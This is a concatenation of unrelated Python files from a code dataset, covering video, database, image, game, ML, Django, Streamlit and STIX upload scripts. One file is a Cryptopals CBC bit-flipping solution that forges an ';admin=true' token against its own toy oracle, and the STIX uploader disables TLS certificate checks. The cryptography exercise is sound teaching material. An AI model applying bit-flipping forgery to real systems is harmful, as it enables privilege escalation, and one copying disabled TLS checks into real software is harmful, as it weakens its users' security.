text\", ssml_text)\n mp3_location = 'out/audio_full.mp3'\n result = speech_synthesis_bookmark_event(ssml_text, mp3_location)\n bookmarks = result.bookmarks\n print(\"got bookmarks\", bookmarks, \"and mp3\", mp3_location)\n # skip hidden files like .DS_Store\n files = sorted([x for x in os.listdir(img_location) if not x.startswith('.')])\n if len(files) != len(bookmarks):\n raise Exception(f'Number of images and number of bookmarks do not match slides {len(files)} and bookmarks {len(bookmarks)}')\n images_config = []\n\n prev_offset = 0\n for i, bookmark in enumerate(sorted(bookmarks, key=lambda x: x['offset'])):\n images_config.append({\n 'file': os.path.join(img_location, files[i]),\n 'duration': str(int(bookmark['offset'] - prev_offset)) + \"ms\"\n })\n prev_offset = bookmark['offset']\n print(\"constructed config\", images_config)\n video_with_slides = 'out/video_with_slides.mp4'\n pics_to_video_from_config(images_config, out_video=video_with_slides)\n print(\"got video with slides\", video_with_slides)\n final_video_path = 'out/full_video_with_audio.mp4'\n combine_with_mp3(video_with_slides, mp3_location, final_video_path)\n print(\"got video with slides\", final_video_path)\n\n\nif __name__ == '__main__':\n ppt_location = sys.argv[1]\n img_location = sys.argv[2]\n if len(sys.argv) > 3:\n voice = sys.argv[3]\n else:\n voice = 'en-US-JennyNeural'\n run_full_program(ppt_location, img_location, voice)\n","repo_name":"romaninozemtsev/slides-to-video","sub_path":"src/overall_script.py","file_name":"overall_script.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72194488565","text":"import data_strings\n\n\ndef test_positive_one_insert(db_start_close):\n db = db_start_close\n db.execute(\"INSERT INTO client VALUES(?, ?, ?)\", data_strings.P_DATA)\n db.commit()\n result = db.execute('SELECT * FROM client').fetchall()\n assert result[-1] == data_strings.P_DATA\n\n\ndef test_positive_multi_insert(db_start_close):\n db = db_start_close\n db.executemany(\"INSERT INTO client VALUES(?, ?, ?)\", data_strings.P_MULTI_DATA)\n db.commit()\n result = db.execute('select * from client').fetchall()\n for item in data_strings.P_MULTI_DATA:\n assert item in result\n\n\ndef test_positive_one_update(db_start_close):\n db = db_start_close\n db.execute(\"\"\"UPDATE client SET Name = \"Holy Molly\" where Name = \"Mark\"\n \"\"\")\n db.commit()\n result = db.execute('SELECT Name FROM client where Name = \"Holy Molly\"').fetchone()\n assert result[0] == \"Holy Molly\"\n\n\ndef test_positive_one_delete(db_start_close):\n db = db_start_close\n db.execute(\"\"\"DELETE FROM client WHERE Id = 3\n \"\"\")\n db.commit()\n result = db.execute('SELECT * FROM client').fetchall()\n assert len(result) == 2\n\n# Не пишу негативные тесты, так как пока не понимаю особо как работает assert\n# с пустыми строками в БД\n","repo_name":"framber/bee_sqlite","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74065132726","text":"import numpy as np\nimport cv2\nimport torch\nimport types\nimport PIL\n\nclass Compose(object):\n \"\"\" Composes several co_transforms together.\n For example:\n >>> co_transforms.Compose([\n >>> co_transforms.CenterCrop(10),\n >>> co_transforms.ToTensor(),\n >>> ])\n \"\"\"\n\n def __init__(self, t):\n self.co_transforms = t\n\n def extend(self, t):\n self.co_transforms.extend(t)\n\n def insert(self, index, t):\n self.co_transforms.insert(index, t)\n\n def write_img(self, img=[], ch_num=-1, name='', en=False):\n if en == False:\n return\n #name = './data/checkpoints/tiad_interest_pt_descriptor/debug/{:02d}.jpg'.format(aug_idx)\n scale_range = 255.0 / np.max(img)\n img = np.clip(img * scale_range, 0.0, 255.0)\n img = np.asarray(img, 'uint8')\n\n non_zero_el = cv2.countNonZero(img)\n\n print(\"non zero element: {}\".format(non_zero_el))\n cv2.imwrite('{}_nz{}.jpg'.format(name, non_zero_el), img)\n\n def __call__(self, input, target):\n if self.co_transforms:\n for aug_idx, t in enumerate(self.co_transforms):\n if t:\n input,target = t(input,target)\n\n return input,target\n\n\n\nclass Bypass(object):\n def __init__(self):\n pass\n\n def __call__(self, images, targets):\n return images,targets\n\n\nclass Lambda(object):\n \"\"\"Applies a lambda as a transform\"\"\"\n\n def __init__(self, lambd):\n assert isinstance(lambd, types.LambdaType)\n self.lambd = lambd\n\n def __call__(self, input,target):\n return self.lambd(input,target)\n\n\nclass ImageTransformUtils(object):\n @staticmethod\n def apply_to_list(func, inputs, *args, **kwargs):\n for img_idx in range(len(inputs)):\n inputs[img_idx] = func(inputs[img_idx], img_idx, *args, **kwargs)\n\n return inputs\n\n @staticmethod\n def apply_to_lists(func, images, targets, *args, **kwargs):\n for img_idx in range(len(images)):\n images[img_idx], targets[img_idx] = func(images[img_idx], targets[img_idx], img_idx, *args, **kwargs)\n\n return images, targets\n\n @staticmethod\n def crop(img, r, c, h, w):\n img = img[r:(r+h), c:(c+w),...] if (len(img.shape)>2) else img[r:(r+h), c:(c+w)]\n return img\n\n @staticmethod\n def resize_fast(img, output_size_rc, interpolation=-1):\n in_h, in_w = img.shape[:2]\n out_h, out_w = output_size_rc\n if interpolation<0:\n interpolation = cv2.INTER_AREA if ((out_h= abs(self.vx):\n self.vx = 0\n elif self.vx >= 0:\n self.vx -= 6 * dt\n else:\n self.vx += 6 * dt\n if self.vy != 0:\n if 6 * dt >= abs(self.vy):\n self.vy = 0\n elif self.vy >= 0:\n self.vy -= 6 * dt\n else:\n self.vy += 6 * dt\n\n def collusion(self, level_mask, ball_mask, trap_mask, x, y):\n \"\"\"\n Check collusion ball with walls and traps\n :param level_mask: mask with level walls\n :param ball_mask: mask with ball\n :param trap_mask: mask with level traps\n :param x: start ball x position\n :param y: start ball y position\n \"\"\"\n overlap_walls_x = level_mask.overlap(ball_mask, (self.x + self.vx - 0, self.y - 0))\n overlap_walls_y = level_mask.overlap(ball_mask, (self.x - 0, self.y + self.vy - 0))\n overlap_traps = trap_mask.overlap(ball_mask, (self.x + self.vx - 0, self.y + self.vy - 0))\n if overlap_walls_x:\n self.vx = -self.vx\n self.hit = True\n if overlap_walls_y:\n self.hit = True\n self.vy = -self.vy\n self.x += self.vx\n self.y += self.vy\n if overlap_traps:\n self.x = x\n self.y = y\n self.vx = 0\n self.vy = 0\n self.ax = 0\n self.ay = 0\n\n def finish(self, ball_mask, finish_mask, obj, x_finish, y_finish, running):\n \"\"\"\n Check collusion ball with finish\n :param ball_mask: mask with ball\n :param finish_mask: mask with finish\n :param obj: object in class menu\n :param x_finish: x coordinate of finish surface\n :param y_finish: y coordinate of finish surface\n :param running: flag, that end level\n :return: running\n \"\"\"\n overlap_finish = finish_mask.overlap(ball_mask, (x_finish - self.x + self.vx, y_finish - self.y + self.vy))\n if overlap_finish:\n running = False\n obj.menu_live = 1\n obj.intermediate_menu = 1\n if obj.level_1:\n coord_of_start[0] = [90, 80]\n elif obj.level_2:\n coord_of_start[1] = [100, 80]\n elif obj.level_3:\n coord_of_start[2] = [1250, 75]\n elif obj.level_4:\n coord_of_start[3] = [100, 360]\n obj.intermediate_menu = 0\n obj.home_surface = 1\n return running\n","repo_name":"ArturSadykov2/Project_labirint","sub_path":"game_objects/game_objects_ball.py","file_name":"game_objects_ball.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30575518429","text":"from os import XATTR_SIZE_MAX\nimport torch \nimport torch.nn as nn\nimport scipy.io as sp\nimport sklearn.metrics\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\ndef plot_data(X, Y):\n\n data_x_class_pos = []\n data_y_class_pos = []\n data_x_class_neg = []\n data_y_class_neg = []\n\n for i in range(0, len(X)):\n if Y[i] == -1:\n data_x_class_pos.append(X[i][0]) \n data_y_class_pos.append(X[i][1])\n else:\n data_x_class_neg.append(X[i][0]) \n data_y_class_neg.append(X[i][1])\n\n plt.scatter(data_x_class_pos, data_y_class_pos, color='orange')\n plt.scatter(data_x_class_neg, data_y_class_neg, color='blue')\n plt.show()\n\ndef converge_to_binary(x):\n x = np.where(x < .5, -1, 1)\n return x\n\ndef converge_to_prob(x):\n x = np.where(x < 0., 0., 1.)\n return x\n\ndata = sp.loadmat(\"hw04_dataset.mat\")\n\n# print(data)\n\nX = data[\"X_trn\"]\nY = data[\"y_trn\"]\n\n# print(X)\n\nX_test = data[\"X_tst\"]\nY_test = data[\"y_tst\"]\n\n# Defining input size, hidden layer size, output size and batch size respectively\nn_in, n_h, n_out, hidden_layers, activation_function = 2, 50, 1, 2, 'relu'\n\nx = torch.tensor(X).float()\ny = torch.tensor(Y).float()\n\nx_test = torch.tensor(X_test).float()\ny_test = torch.tensor(Y_test).float()\n\n\nclass MyModule(nn.Module):\n def __init__(self, n_in, neurons_per_hidden, n_out, hidden_layers, activation_function):\n super(MyModule, self).__init__()\n\n self.n_in = n_in\n self.n_h = neurons_per_hidden\n self.n_out = n_out\n self.h_l = hidden_layers\n\n self.a_f = activation_function\n\n # Inputs to hidden layer linear transformation\n self.input = nn.Linear(n_in, self.n_h)\n # Defaults to Relu if activation_function is improperly sp\n self.activation_layer = nn.ReLU()\n\n if activation_function == 'relu':\n self.activation_layer = nn.ReLU()\n elif activation_function == 'tanh':\n self.activation_layer = nn.Tanh()\n elif activation_function == 'sigmoid':\n self.activation_layer == nn.Sigmoid()\n elif activation_function == 'identity':\n self.activation_layer == nn.Identity()\n else:\n print(\"Invalid activation function specified\")\n sys.exit(1)\n\n self.linears = nn.ModuleList([nn.Linear(self.n_h, self.n_h) for i in range(self.h_l - 1)])\n self.activation_layers = nn.ModuleList([self.activation_layer for i in range(self.h_l - 1)])\n \n # Output layer, 10 units - one for each digit\n self.output = nn.Linear(self.n_h, n_out)\n # Define sigmoid output\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n\n x = self.input(x)\n x = self.activation_layer(x)\n\n # ModuleList can act as an iterable, or be indexed using ints\n for i, l in enumerate(self.linears):\n x = self.linears[i // 2](x) + l(x)\n x = self.activation_layers[i // 2](x) + l(x)\n\n x = self.output(x)\n x = self.sigmoid(x)\n\n return x\n\nmodel = nn.Sequential(MyModule(n_in, n_h, n_out, hidden_layers, activation_function))\n# print(model)\n\n# Construct the loss function\ncriterion = torch.nn.BCELoss()\n# Construct the optimizer (Adam in this case)\noptimizer = torch.optim.Adam(model.parameters(), lr = 0.05)\n\n# Optimization\nfor epoch in range(50):\n # Forward pass: Compute predicted y by passing x to the model\n y_pred = model(x)\n\n y_pred_numpy = y_pred.detach().numpy()\n y_pred_tanh_range = converge_to_binary(y_pred_numpy)\n y_numpy = y.detach().numpy()\n y_sigmoid_range = converge_to_prob(y_numpy)\n\n# print(sklearn.metrics.accuracy_score(y_pred_tanh_range, y))\n\n # Compute and print loss\n loss = criterion(y_pred, torch.tensor(y_sigmoid_range).float())\n# print('epoch: ', epoch,' loss: ', loss.item())\n\n # Zero gradients, perform a backward pass, and update the weights.\n optimizer.zero_grad()\n\n # perform a backward pass (backpropagation)\n loss.backward()\n\n # Update the parameters\n optimizer.step()\n\n# Plotting training data\n# plot_data(X, Y)\n\n# Printing all weights and biases from NN\n\nprint(\"All of the weights and biases from all layers in model\")\n\nfor i in model.named_modules():\n print(i[0])\n\n for j in i[1].state_dict().items():\n print(j)\n\ny_pred_tanh_range_from_train = y_pred_tanh_range\n\ny_pred = model(x_test)\ny_pred_numpy = y_pred.detach().numpy()\ny_pred_tanh_range = converge_to_binary(y_pred_numpy)\n\nprint(\"Results of last activation layer\")\nprint(y_pred)\n\nprint(\"Training Accuracy\")\nprint(sklearn.metrics.accuracy_score(y_pred_tanh_range_from_train, y))\n\nprint(\"Testing Accuracy\")\nprint(sklearn.metrics.accuracy_score(y_pred_tanh_range, y_test))\n\n# Plotting the test data\n# plot_data(x_test, y_pred_tanh_range)\n\n","repo_name":"ShaanHossain/DS4400HW3","sub_path":"ds4400_hossain_script.py","file_name":"ds4400_hossain_script.py","file_ext":"py","file_size_in_byte":4803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72533637045","text":"import os\nimport sys\nimport json\nimport requests\nimport argparse\n\n##############################\n# post_stix\n# STIX 登録\n##############################\n# 第1引数:URL\n# 第2引数:username\n# 第3引数:apikey\n# 第4引数:community_name\n# 第5引数:attachment\n##############################\n# オプション\n# -p package name\n##############################\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Post STIX Script')\n parser.add_argument('-p', '--package_name', help='package name(option)')\n parser.add_argument('url', help='url')\n parser.add_argument('user_name', help='user name')\n parser.add_argument('apikey', help='apikey')\n parser.add_argument('community_name', help='community name')\n parser.add_argument('attachments', help='attachements file')\n args = parser.parse_args()\n\n # 認証情報\n headers = {\n 'username': args.user_name,\n 'apikey': args.apikey,\n }\n\n # upload情報\n data = {\n 'community_name': args.community_name\n }\n if args.package_name is not None:\n data['package_name'] = args.package_name\n\n # ファイルアップロード\n files = {}\n files['stix'] = open(args.attachments)\n\n # リクエスト送信\n r = requests.post(\n args.url,\n headers=headers,\n data=data,\n files=files,\n verify=False)\n\n # response 解析\n b = json.loads(r.text)\n if r.status_code != 201:\n print('Request Failed (%s, %s).' % (r.status_code, b['userMessage']))\n sys.exit(os.EX_UNAVAILABLE)\n else:\n print('Success!')\n sys.exit(os.EX_OK)\n","repo_name":"s-tip/stip-rs","sub_path":"bin/post_stix.py","file_name":"post_stix.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"ja","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"32318321014","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 23 10:47:00 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\n# =============================================================================\r\n# 3.2 处理单个工作表\r\n# =============================================================================\r\n#3.2.1 读写Excel文件\r\n#基础Python和xlrd、xlwt模块\r\n\r\n#导入xlrd模块的open_workbook函数,xlwt模块的Workbook对象\r\nimport sys\r\nfrom xlrd import open_workbook\r\nfrom xlwt import Workbook\r\n\r\ninput_file = sys.argv[1]\r\noutput_file = sys.argv[2]\r\n\r\n#实例化一个xlwt Workbook对象,可将结果写入用于\"输出\"的Excel文件(工作簿)\r\noutput_workbook = Workbook()\r\n#使用xlwt的add_sheet函数为\"输出\"工作簿添加一个名为jan_2013_output的工作表\r\noutput_worksheet = output_workbook.add_sheet('jan_2013_output')\r\n\r\n#使用xlrd的open_workbook函数打开用于\"输入\"的工作簿,并将结果赋给一个workbook对象\r\nwith open_workbook(input_file) as workbook:\r\n \r\n# 使用这个workbook对象的sheet_by_name函数引用名称为january_2013的工作表\r\n worksheet = workbook.sheet_by_name('january_2013')\r\n \r\n# 创建行与列索引值上的for循环语句,使用range函数和worksheet对象的nrows属性和\r\n# ncols属性,在工作表的每行和每列之间迭代。\r\n for row_index in range(worksheet.nrows):\r\n for column_index in range(worksheet.ncols):\r\n \r\n# 使用xlwt的write函数和行与列的索引将每个单元格的值写入输出文件的工作表。\r\n output_worksheet.write(row_index, column_index, \\\r\n worksheet.cell_value(row_index, column_index))\r\n\r\n#保存并关闭输出工作簿 \r\noutput_workbook.save(output_file)\r\n \r\n","repo_name":"lilyan0624/MyProject","sub_path":"EbookStudy/Basic Python for Data Analysis/chapter3/2excel_parsing_and_write.py","file_name":"2excel_parsing_and_write.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15032052833","text":"import pandas as pd\nfrom pandas import ExcelFile\n\n\ndef attendance():\n\n \"\"\"\n\n 전체 사람들의 명단을 하나의 list로 저장해두기 위해서 만든 method\n 엑셀 파일을 읽어와서 {지원서id}+{이름} 의 string 형식으로 저장하고, 전체 사람의 list 반환\n\n \"\"\"\n intervieweeList = []\n df = pd.read_excel(r'availability_file.xlsx')\n\n for index,row in df.iterrows():\n nameId = ''\n nameId += str(row[0])\n nameId += str(row[1])\n intervieweeList.append(nameId) \n\n return intervieweeList\n\n\nif __name__ == \"__main__\":\n\tattendance()","repo_name":"jenny5546/Interview-Automatic-Scheduler","sub_path":"namelist.py","file_name":"namelist.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5577738406","text":"from django.contrib.sitemaps.views import sitemap\nfrom django.contrib.staticfiles.storage import staticfiles_storage\nfrom django.urls import path\nfrom django.views.generic import RedirectView\n\nfrom main.sitemaps import blog_dict, StaticViewSitemap, project_dict\nfrom django.contrib.sitemaps import GenericSitemap\n\n\nfrom main.views import IndexView, ProjectsView, AboutView, ProjectDetailView, BlogView, BlogDetailView\n\nsitemaps = {\n 'blog': GenericSitemap(blog_dict, priority=0.5),\n 'projects': GenericSitemap(project_dict, priority=0.5),\n 'static': StaticViewSitemap,\n}\n\nurlpatterns = [\n path('', IndexView.as_view(), name='index'),\n path('projects/', ProjectsView.as_view(), name='projects'),\n path('projects/', ProjectDetailView.as_view(), name='project details'),\n path('blog/', BlogView.as_view(), name='blog'),\n path('blog/', BlogDetailView.as_view(), name='blog post details'),\n path('about/', AboutView.as_view(), name='about'),\n path('sitemap.xml', sitemap, {'sitemaps': sitemaps},\n name='django.contrib.sitemaps.views.sitemap'),\n path(\n \"favicon.ico\",\n RedirectView.as_view(url=staticfiles_storage.url(\"favicon.ico\")),\n ),\n]\n\n","repo_name":"DimoDimchev/Personal-Website","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40385859666","text":"from urllib import parse\nfrom util import aes_helper, padding\n\n\ndef getCiphertext(userdata, encryptor):\n userdata = parse.quote(userdata)\n message = (\n b\"comment1=cooking%20MCs;userdata=\"\n + bytes(userdata, \"ascii\")\n + b\";comment2=%20like%20a%20pound%20of%20bacon\"\n )\n message = padding.pkcs7Pad(message)\n return encryptor.update(message) + encryptor.finalize()\n\n\ndef isAdmin(ciphertext, decryptor):\n message = decryptor.update(ciphertext) + decryptor.finalize()\n message = padding.pkcs7Strip(message)\n print(message)\n return b\";admin=true;\" in message\n\n\ndef editCiphertext(userdata, ciphertext):\n ciphertext = bytearray(ciphertext)\n for i, u in zip(range(16), b\";admin=true\"):\n ciphertext[i + 16] = ciphertext[i + 16] ^ userdata[i] ^ u\n return bytes(ciphertext)\n\n\n# Garbled block doesn't parse nicely into ascii.\n# I am able to inject the target into the plaintext by manipulating the ciphertext though.\nif __name__ == \"__main__\":\n cipher = aes_helper.getCBCCipher()\n userdata = b\"1\" * 11\n ct = getCiphertext(userdata, cipher.encryptor())\n print(isAdmin(ct, cipher.decryptor()))\n ct = editCiphertext(userdata, ct)\n print(isAdmin(ct, cipher.decryptor()))\n","repo_name":"jessetham/cryptopals","sub_path":"s2c16.py","file_name":"s2c16.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15079700731","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/10/30 9:07\n# @Author : mrwuzs\n# @Site :\n# @File : test_14_delete_tenant_user.py\n# @Software: PyCharm\nimport pytest\nimport allure\n\nfrom public.common.publicfunction import *\nfrom public.common import datainfo\nfrom public.appmodel import useraction\nfrom public.pages import authUserPage\nfrom public.appmodel.loginaction import Login\n\n\n@allure.feature(\"用户管理\")\nclass TestDeleteUser():\n \"\"\"删除运营部门下的用户测试\"\"\"\n\n @allure.story(\"删除运营部门下的用户\")\n @pytest.mark.flaky(reruns=globalparam.RENUM)\n def test_delete_tenant_user(self,login_domain):\n dr = login_domain\n data1s = datainfo.get_xls_to_dict(\"user.xlsx\", \"authuser\")[\"创建运营部门用户\"]\n aupg = authUserPage.AuthUsertPage(dr)\n ta = useraction.UserAction(dr)\n ta.delete_tenant_user(data1s[\"username\"])\n aupg.open_authuser()\n\n aupg.input_select_user(data1s[\"username\"])\n dr.wait(5)\n add_image(dr,\"删除运营部门下的用户\")\n flag = dr.element_exist(\"xpath->//td\")\n assert flag is False\n\nif __name__ == \"__main__\":\n pytest.main([\"-s\", \"test_14_delete_tenant_user.py\"])\n","repo_name":"woozs/ui_auto_test","sub_path":"testcase/test_14_delete_tenant_user.py","file_name":"test_14_delete_tenant_user.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"72024679606","text":"#分析数据\nimport cv2\nimport os\n\nsize = []\n\ndef read_img(img_path):\n\n max_height = 0\n max_width =0\n\n files = os.listdir(r'./'+img_path)\n files.sort(key=lambda x: int(x[:-4]))\n\n for filename in files:\n img = cv2.imread(img_path + '/' + filename)\n shape = img.shape\n size.append(shape)\n\n height = shape[0]\n width = shape[1]\n if height >= max_height:\n max_height = height\n\n if width >= max_width:\n max_width = width\n\n with open(\"train_img_info.txt\", \"a+\") as f: # 打开文件并追加写,没有就创建\n f.write(str(filename)) #可以写入文件名\n f.write(\" \") # 写入空格\n f.write(str(height)) # 写入height\n f.write(\" \") # 写入空格\n f.write(str(width)) # 写入width\n f.write(\"\\n\") # 写入换行\n\n with open(\"train_img_info.txt\", \"a+\") as f:\n f.write(\"max_height: \")\n f.write(str(max_height))\n f.write(\"max_width: \")\n f.write(str(max_width))\n\n print(\"最大高:\", max_height, \"最大宽:\", max_width)\n\nif __name__==\"__main__\":\n path1 = 'data/train/calling_images'\n path2 = 'data/train/normal_images'\n path3 = 'data/train/smoking_images'\n\n read_img(path1)\n read_img(path2)\n read_img(path3)\n\n\n\n\n\n\n","repo_name":"CreatSSR/PyTorch_demo","sub_path":"demo_pic_info.py","file_name":"demo_pic_info.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5006342135","text":"import streamlit as st\nimport pandas as pd\nfrom guest_crud import view_listing\n\ndef view_host_listings(connection):\n with connection.cursor() as cursor:\n # Retrieve the listings created by the current user from Listings table\n sql = \"SELECT * FROM Listings WHERE host_id = %s\"\n cursor.execute(sql, (st.session_state.user_id,))\n listings = cursor.fetchall()\n\n if listings:\n # # Define number of items to display per page\n # items_per_page = st.slider(\"Items per page\", min_value=1, max_value=20, value=10)\n # # Determine number of pages\n # num_pages = len(listings) // items_per_page + (len(listings) % items_per_page > 0)\n # # Add pagination\n # page = st.number_input(\"Page\", min_value=1, max_value=num_pages, value=1)\n # start_idx = (page - 1) * items_per_page\n # end_idx = start_idx + items_per_page\n # listings_page = listings[start_idx:end_idx]\n # # Display listings in a table\n # st.table(listings_page)\n if listings:\n st.markdown(\"

Available Listings

\", unsafe_allow_html=True)\n # Add search bar for filtering listings by name, location, or other details\n search_term = st.text_input(\"Search listings:\")\n if search_term:\n listings = [listing for listing in listings if search_term.lower() in str(listing).lower()]\n\n listings_df = pd.DataFrame(listings)\n cols_rename = [' '.join(c.capitalize().split('_')) for c in listings_df.columns]\n listings_df.columns = cols_rename\n\n cols = st.columns((1,4,2,3,3,2))\n fields = [\"No.\",\"Name\",\"Price\",\"Minimum Nights\",\"Maximum Nights\",\" \"]\n for col, field_name in zip(cols, fields):\n col.write(field_name)\n \n for idx in listings_df.index:\n col1, col2, col3, col4,col5,col6 = st.columns((1,4,2,3,3,2))\n col1.write(idx+1)\n col2.write(listings_df['Name'][idx])\n col3.write(listings_df['Price'][idx])\n col4.write(listings_df['Minimum nights'][idx])\n col5.write(listings_df['Maximum nights'][idx])\n view_button = col6.empty()\n action = view_button.button(\"View\", key=idx)\n \n if action:\n view_listing(listings_df.loc[idx])\n\n else:\n st.markdown(\"

You have no listings!

\", unsafe_allow_html=True)\n\ndef create_host_listings(connection):\n listing_name = st.text_input(\"Listing Name\", value=\"\")\n listing_price = st.number_input(\"Price per night\", value = 0.0)\n listing_latitude = st.number_input(\"Latitude\", format=\"%.5f\")\n listing_longitude = st.number_input(\"Longitude\", format=\"%.5f\")\n listing_min_nights = st.number_input(\"Minimum Nights\", value=0)\n listing_max_nights = st.number_input(\"Maximum Nights\", value=0)\n listing_desc = st.text_input(\"Description\")\n listing_occupancy = st.number_input(\"Maximum Occupancy\", value=0)\n listing_bedrooms = st.number_input(\"Bedrooms\", value=0)\n listing_bathrooms = st.number_input(\"Bathrooms\", value=0)\n listing_license = st.text_input(\"License\")\n listing_has_availability = st.checkbox(\"Has Availability\")\n with connection.cursor() as cursor:\n # Query all neighbourhood names from the database\n sql = \"SELECT neighbourhood_id, name FROM Neighbourhoods\"\n cursor.execute(sql)\n neighbourhoods = cursor.fetchall()\n neighbourhood_names = [neighbourhood['name'] for neighbourhood in neighbourhoods]\n\n # Retrieve all property type names from PropertyTypes table\n cursor.execute(\"SELECT property_type_name FROM PropertyTypes\")\n property_types = cursor.fetchall()\n property_type_names = [pt['property_type_name'] for pt in property_types]\n\n # Retrieve all room type names from RoomTypes table\n cursor.execute(\"SELECT room_type_name FROM RoomTypes\")\n room_type_names = [row[\"room_type_name\"] for row in cursor.fetchall()]\n\n # Create the neighbourhood dropdown\n listing_neighbourhood_name = st.selectbox(\"Neighbourhood\", neighbourhood_names)\n listing_neighbourhood_id = next(neighbourhood['neighbourhood_id'] for neighbourhood in neighbourhoods \n if neighbourhood['name'] == listing_neighbourhood_name)\n listing_property_type_name = st.selectbox(\"Property Type\", property_type_names)\n listing_room_type_name = st.selectbox(\"Room Type\", room_type_names)\n\n listing_amenities = st.text_input(\"Amenities\")\n\n if st.button(\"Create\"):\n if listing_name.strip() == \"\":\n st.write(\"Listing name cannot be empty!\")\n elif listing_license.strip() == \"\":\n st.write(\"License is needed!\")\n else:\n with connection.cursor() as cursor:\n # Check if listing with same name already exists for this user\n sql = \"SELECT COUNT(*) FROM Listings WHERE name = %s AND host_id = %s\"\n cursor.execute(sql, (listing_name, st.session_state.user_id))\n result = cursor.fetchone()\n if result[\"COUNT(*)\"] > 0:\n st.write(\"A listing with the same name already exists for this user.\")\n else:\n sql = \"INSERT INTO Listings (name, price, latitude, longitude, minimum_nights, maximum_nights, description, occupancy, bedrooms, bathrooms, license, has_availability, host_id, neighbourhood_id, property_type_name, room_type_name, amenities) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor.execute(sql, (listing_name, listing_price, listing_latitude, listing_longitude, listing_min_nights, listing_max_nights, listing_desc, listing_occupancy, listing_bedrooms, listing_bathrooms, \n listing_license, listing_has_availability, st.session_state.user_id, \n listing_neighbourhood_id, listing_property_type_name, listing_room_type_name, listing_amenities))\n connection.commit()\n st.write(\"Listing created!\")\n\n \n\ndef edit_host_listings(connection):\n with connection.cursor() as cursor:\n # Retrieve all listings from Listings table for the current user\n sql = \"SELECT * FROM Listings WHERE host_id = %s\"\n cursor.execute(sql, st.session_state.user_id)\n listings = cursor.fetchall()\n\n if listings:\n # Create a list of listing names to display in the dropdown\n listing_names = [listing['name'] for listing in listings]\n\n # Create the listing dropdown\n st.markdown(\"
Your Listings
\", unsafe_allow_html=True)\n selected_listing_name = st.selectbox(\"Select a listing to edit:\", listing_names)\n\n # Get the selected listing's ID\n selected_listing_id = None\n for listing in listings:\n if listing['name'] == selected_listing_name:\n selected_listing_id = listing['listing_id']\n break\n\n # Get the current values of the selected listing\n selected_listing = None\n for listing in listings:\n if listing['listing_id'] == selected_listing_id:\n selected_listing = listing\n break\n st.markdown(\"
Details
\", unsafe_allow_html=True)\n with connection.cursor() as cursor:\n # Query all neighbourhood names from the database\n sql = \"SELECT neighbourhood_id, name FROM Neighbourhoods\"\n cursor.execute(sql)\n neighbourhoods = cursor.fetchall()\n neighbourhood_names = [neighbourhood['name'] for neighbourhood in neighbourhoods]\n\n # Retrieve all property type names from PropertyTypes table\n cursor.execute(\"SELECT property_type_name FROM PropertyTypes\")\n property_types = cursor.fetchall()\n property_type_names = [pt['property_type_name'] for pt in property_types]\n\n # Retrieve all room type names from RoomTypes table\n cursor.execute(\"SELECT room_type_name FROM RoomTypes\")\n room_type_names = [row[\"room_type_name\"] for row in cursor.fetchall()]\n\n # # Retrieve all listings from Listings table\n # cursor.execute(\"SELECT * FROM Listings\")\n # listings = cursor.fetchall()\n\n\n # Find the selected listing and pre-fill the input fields with the existing data\n for listing in listings:\n if listing[\"name\"] == selected_listing_name:\n listing_id = listing[\"listing_id\"]\n listing_name = st.text_input(\"Listing Name\", value=listing[\"name\"])\n listing_price = st.number_input(\"Listing Price\", value=listing[\"price\"])\n listing_latitude = st.number_input(\"Listing Latitude\", value=listing[\"latitude\"])\n listing_longitude = st.number_input(\"Listing Longitude\", value=listing[\"longitude\"])\n listing_min_nights = st.number_input(\"Minimum Nights\", value=listing[\"minimum_nights\"])\n listing_max_nights = st.number_input(\"Maximum Nights\", value=listing[\"maximum_nights\"])\n listing_desc = st.text_input(\"Description\", value=listing[\"description\"])\n listing_occupancy = st.number_input(\"Occupancy\", value=listing[\"occupancy\"])\n listing_bedrooms = st.number_input(\"Bedrooms\", value=listing[\"bedrooms\"])\n listing_bathrooms = st.number_input(\"Bathrooms\", value=listing[\"bathrooms\"])\n listing_license = st.text_input(\"License\", value=listing[\"license\"])\n listing_has_availability = st.checkbox(\"Has Availability\", value=listing[\"has_availability\"])\n listing_neighbourhood_name = st.selectbox(\"Neighbourhood\", neighbourhood_names)\n listing_neighbourhood_id = next(neighbourhood['neighbourhood_id'] for neighbourhood in neighbourhoods \n if neighbourhood['name'] == listing_neighbourhood_name)\n listing_property_type_name = st.selectbox(\"Property Type\", property_type_names, 